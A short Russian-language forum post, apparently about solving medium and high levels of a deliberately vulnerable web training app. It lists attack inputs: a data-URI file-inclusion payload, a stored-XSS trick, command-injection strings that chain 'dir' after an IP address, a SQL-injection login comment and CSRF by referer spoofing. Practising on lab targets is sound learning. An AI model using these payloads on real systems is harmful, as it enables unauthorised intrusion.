Напишу тут пару моментов, вдруг будет интересно.
Файл-инклуд на med можно так:
?page=data:,&cmd=phpinfo();
XSS storaged на med - расширить уязвимое поле с именем и туда вставить js без тега .
Exec med так:
127.0.x.1 || dir
127.0.0.1 & dir
Сообщение от
mr.celt
mr.celt said:
Вопрос: почему не сработало admin'--+
Потому что admin' -- , это не адресная строка, чтобы пробел заменять +.
На med не знаю, как сделать.
CSRF med - реферер спуфинг.
На high, на мой взгляд, там ничего не уязвимо.
Ну и да, извините за раскопки.